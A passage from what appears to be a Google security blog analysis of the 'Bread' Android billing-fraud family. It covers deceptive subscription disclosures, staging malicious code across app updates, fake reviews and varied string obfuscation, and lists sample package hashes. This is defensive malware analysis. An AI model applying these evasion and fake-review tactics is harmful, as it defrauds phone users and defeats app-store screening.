src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGq7h5f05pBnhkJHUork21ShlzEBprudwJepX2HdimmD2nU0mnBLsPEiVZTHcfqAegRvnyd_ulXeiJVEpL6elrL6DQR4J_X4B6x0xvn6sGWql8IA0Vam1gMGj3rRyh9l7RCIE1w6g2QW14/s400/pastedimage0.png" width="240" /></a></div> <em>Translation: &#8220;This app is a place to be and it will feel like a superhero with this new app. We hope you enjoy it!&#8221;</em> <br /> Other versions included all the pieces needed for a valid disclosure message. 
<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizocTMrtfJG1zz64BT3VRWq5SNualxjEc0UhcXYoQHv1_VBG6zWk5z2lVWJey78rO5Jc8CeHVaO7YiwdAl4IjIdp4X7rWO08jV553NsTkjBIdoaBX0YWvjWDVN0NgpTIBzZnYgeeEziYD6/s1600/pastedImage0%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="288" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizocTMrtfJG1zz64BT3VRWq5SNualxjEc0UhcXYoQHv1_VBG6zWk5z2lVWJey78rO5Jc8CeHVaO7YiwdAl4IjIdp4X7rWO08jV553NsTkjBIdoaBX0YWvjWDVN0NgpTIBzZnYgeeEziYD6/s400/pastedImage0%25281%2529.png" width="240" /></a></div> When translated the disclosure reads: <br /> <em>&#8220;Apply Car Racing Clip \n Please enter your phone number for service details. \n Terms and Conditions \nFrom 9 Baht / day, you will receive 1 message / day. \nPlease stop the V4 printing service at 4739504 \n or call 02-697-9298 \n Monday - Friday at 8.30 - 5.30pm \n&#8221;</em> <br /> However, there are still two issues here: <br /> <ol> <li>The numbers to contact for cancelling the subscription are not real </li> <li>The billing process commences even if you don&#8217;t hit the &#8220;Confirm&#8221; button </li> </ol> Even if the disclosure here displayed accurate information, the user would often find that the advertised functionality of the app did not match the actual content. Bread apps frequently contain no functionality beyond the billing process or simply clone content from other popular apps. <br /> <h1> VERSIONING</h1> Bread has also leveraged an abuse tactic unique to app stores: versioning. Some apps have started with clean versions, in an attempt to grow user bases and build the developer accounts&#8217; reputations. Only later is the malicious code introduced, through an update. 
Interestingly, early &#8220;clean&#8221; versions contain varying levels of signals that the updates will include malicious code later. Some are first uploaded with all the necessary code except the one line that actually initializes the billing process. Others may have the necessary permissions, but are missing the classes containing the fraud code. And others have all malicious content removed, except for log comments referencing the payment process. All of these methods attempt to space out the introduction of possible signals in various stages, testing for gaps in the publication process. However, Google Play Protect (GPP) does not treat new apps and updates any differently from an analysis perspective, so staging the malicious code across versions does not exempt an update from the same scrutiny as a fresh submission. <br /> <h1> FAKE REVIEWS</h1> When early versions of apps are first published, many (fake) five star reviews appear with comments like: <br /> <span id="docs-internal-guid-8eedb8d6-7fff-bd38-9c86-11bc00e9594f"><span style="color: #434343; font-family: &quot;roboto&quot; , sans-serif; font-size: 14pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 35px; overflow: hidden; width: 130px;"><img alt="Five-star rating" height="35" src="https://lh5.googleusercontent.com/FKSIFYZvO3Nno5Zt9ixuDfMsoQ4cCQ-b2o0EqMwU6ffz5e0Q4cmwU8b5W3zaBs-toygv_6q1cDzB4ld1y_zH2zH0MAs5iaddUzuHjSMOwps0mJSVn3WYmRrmOgN4Yavvww-2-eGc" style="margin-left: 0px; margin-top: 0px;" width="130" /></span></span></span><span style="color: #434343; font-family: &quot;roboto&quot; , sans-serif; font-size: 14pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 35px; overflow: hidden; width: 130px;"><br /></span></span> <br /> <em>&#8220;So..good..&#8221;</em> <br /> <em>&#8220;very beautiful&#8221;</em> <br /> Later, 1 star reviews from <em>real</em> users start appearing with comments like: <br /> <em>&#8220;Deception&#8221;</em> <br /> <em>&#8220;The app is not honest &#8230;&#8221;</em> <br /> <h1> SUMMARY</h1> Sheer volume appears 
to be the preferred approach for Bread developers. At different times, we have seen three or more active variants using different approaches or targeting different carriers. Within each variant, the malicious code present in each sample may look nearly identical with only one evasion technique changed. Sample 1 may use AES-encrypted strings with reflection, while Sample 2 (submitted on the same day) will use the same code but with plaintext strings. <br /> At peak times of activity, we have seen up to 23 different apps from this family submitted to Play in one day. At other times, Bread appears to abandon hope of making a variant successful and we see a gap of a week or longer before the next variant. This family showcases the amount of resources that malware authors now have to expend. Google Play Protect is constantly updating detection engines and warning users of malicious apps installed on their device. <br /> <h1> SELECTED SAMPLES</h1> <table> <tbody> <tr> <td><strong>Package Name</strong> </td> <td><strong>SHA-256 Digest</strong> </td> </tr> <tr> <td>com.rabbit.artcamera </td> <td>18c277c7953983f45f2fe6ab4c7d872b2794c256604e43500045cb2b2084103f </td> </tr> <tr> <td>org.horoscope.astrology.predict </td> <td>6f1a1dbeb5b28c80ddc51b77a83c7a27b045309c4f1bff48aaff7d79dfd4eb26 </td> </tr> <tr> <td>com.theforest.rotatemarswallpaper </td> <td>4e78a26832a0d471922eb61231bc498463337fed8874db5f70b17dd06dcb9f09 </td> </tr> <tr> <td>com.jspany.temp </td> <td>0ce78efa764ce1e7fb92c4de351ec1113f3e2ca4b2932feef46d7d62d6ae87f5 </td> </tr> <tr> <td>com.hua.ru.quan </td> <td>780936deb27be5dceea20a5489014236796a74cc967a12e36cb56d9b8df9bc86 </td> </tr> <tr> <td>com.rongnea.udonood </td> <td>8b2271938c524dd1064e74717b82e48b778e49e26b5ac2dae8856555b5489131 </td> </tr> <tr> <td>com.mbv.a.wp </td> <td>01611e16f573da2c9dbc7acdd445d84bae71fecf2927753e341d8a5652b89a68 </td> </tr> <tr> <td>com.pho.nec.sg </td> <td>b4822eeb71c83e4aab5ddfecfb58459e5c5e10d382a2364da1c42621f58e119b </td> </tr> 
</tbody></table>
</div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'> &#58821; </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'> &#58821; </i> &#160; </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2017/'> 2017 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' 
href='https://security.googleblog.com/2017/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2017/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'> &#58821; </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'> &#58821; </i> &#160; </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2016/'> 2016 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/09/'> Sep </a> </div> <div class='items'> </div> </li> 
</ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'> &#58821; </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'> &#58821; </i> &#160; </span> </a> 
<a class='post-count-link' href='https://security.googleblog.com/2015/'> 2015 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate 
collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'> &#58821; </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'> &#58821; </i> &#160; </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2014/'> 2014 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' 
href='https://security.googleblog.com/2014/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'> &#58821; </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'> &#58821; </i> &#160; </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2013/'> 2013 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/12/'> Dec </a> </div> <div class='items'> </div> </li> 
</ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> 
<i class='material-icons arrow'> &#58821; </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'> &#58821; </i> &#160; </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2012/'> 2012 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate 
collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'> &#58821; </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'> &#58821; </i> &#160; </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2011/'> 2011 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' 
href='https://security.googleblog.com/2011/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'> &#58821; </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'> &#58821; </i> &#160; </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2010/'> 2010 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2010/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2010/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2010/09/'> Sep </a> </div> <div class='items'> </div> </li> 
</ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2010/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2010/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2010/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2010/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2010/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'> &#58821; </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'> &#58821; </i> &#160; </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2009/'> 2009 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2009/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2009/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a 
class='post-count-link' href='https://security.googleblog.com/2009/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2009/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2009/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2009/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'> &#58821; </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'> &#58821; </i> &#160; </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2008/'> 2008 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2008/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2008/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2008/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2008/08/'> Aug </a> </div> <div 
class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2008/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2008/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2008/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'> &#58821; </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'> &#58821; </i> &#160; </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2007/'> 2007 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2007/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2007/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2007/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2007/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div 
class=''> <a class='post-count-link' href='https://security.googleblog.com/2007/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2007/05/'> May </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> </div> </div> <div class='clear'></div> </div> </div><div class='widget HTML' data-version='1' id='HTML6'> <div class='widget-content'> <a href="https://googleonlinesecurity.blogspot.com/atom.xml"> <img src="" class="sidebar-icon" /> <h2>Feed</h2> </a> </div> <div class='clear'></div> </div></div> <div class='section' id='sidebar-bottom'><div class='widget HTML' data-version='1' id='HTML5'> <div class='widget-content'> <div class='followgooglewrapper'> <script src="https://apis.google.com/js/plusone.js"></script> <div class="g-ytsubscribe" data-channel="Google" data-layout="full"></div> </div> <div class="share followgooglewrapper"> <button data-href="https://twitter.com/intent/follow?original_referer=http://googleonlinesecurity.blogspot.in/&amp;screen_name=google" onclick='sharingPopup(this);' id='twitter-share'><span class="twitter-follow">Follow @google</span></button> <script> function sharingPopup (button) { var url = button.getAttribute("data-href"); window.open( url,'popUpWindow','height=500,width=500,left=10,top=10,resizable=yes,scrollbars=yes,toolbar=yes,menubar=no,location=no,directories=no,status=yes'); } </script> </div> <div class="fb-follow-button"> <a href="https://www.facebook.com/google" target="_blank"><img class="fb-follow" 